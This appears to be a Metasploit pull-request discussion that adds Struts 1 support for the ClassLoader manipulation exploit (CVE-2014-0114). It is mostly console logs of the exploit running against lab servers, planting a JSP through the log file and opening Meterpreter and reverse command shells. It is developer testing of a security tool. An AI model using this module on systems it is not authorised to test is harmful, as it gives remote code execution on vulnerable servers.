Add Struts 1 support for Apache Struts ClassLoader manipulation vulnerability

[julianvilas]

Added support for Struts 1 as described at CVE-2014-0114.

In this case only actions using ActionForms are affected, as detailed at http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VMtgmGRwtgg

Testing env:

• Ubuntu Server 14.04.1 64 bits (3.13.0-32-generic Nexpose #57-Ubuntu SMP)
• Tomcat 8.0.18
• Java version "1.7.0_76" & Java version "1.8.0_31"
• Git rev: 7789d5d
• Struts version: 1.3.10
• Struts 1 application with ActionForms

Test:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting               Required  Description
   ----            ---------------               --------  -----------
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.194                yes       The target address
   RPORT           8080                          yes       The target port
   STRUTS_VERSION  1.x                           yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /struts1-helloworld/Login.do  yes       The path to a struts application action
   VHOST                                         no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         172.16.218.194   no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/jtaRE469.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[*] 172.16.218.194:8080 - Countdown 6...
[*] 172.16.218.194:8080 - Countdown 5...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/jtaRE469.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.218.194
[*] Meterpreter session 1 opened (172.16.218.1:57404 -> 172.16.218.194:4444) at 2015-01-31 00:38:55 +0100
[+] Deleted jtaRE469.jsp
[+] Deleted lRE4

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > 

[jvazquez-r7]

ooo cool, thanks @julianvilas ! Handling it, I need to deploy an Struts 1 app :P gimme a while, will deploy an environment, test and land if sessions =)

[jvazquez-r7]

It was smoothly =) :

msf exploit(struts_code_exec_classloader) > set TARGETURI /Example2/Login.do
TARGETURI => /Example2/Login.do
msf exploit(struts_code_exec_classloader) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:8080 - Modifying Class Loader...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/SmGw8874.jsp
[*] 172.16.158.131:8080 - Generating JSP...
[*] 172.16.158.131:8080 - Dumping JSP into the logfile...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[*] 172.16.158.131:8080 - Countdown 7...
[*] Sending stage (36 bytes) to 172.16.158.131
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/SmGw8874.jsp
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.131:37374) at 2015-01-30 18:44:47 -0600
[+] Deleted SmGw8874.jsp
[+] Deleted BHGhX

343017005
kGhNoXGFWVAJABSTuTWbqhdRZCoFrdZh
BugcOXKlWBuLzrpbyEgdiSpRuwQEcDFu
GwELgRCLlhEfnGCgFWiiUZszmaVTMJAr
id
uid=1000(juan) gid=1000(juan) groups=1000(juan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)

Thanks @julianvilas , landing!

[jvazquez-r7]

btw, in case someone else needs to test by himself, I've used an example app available here: http://www.dzone.com/tutorials/java/struts/struts-example/struts-login-page-example-1.html , pointed by @julianvilas , thanks!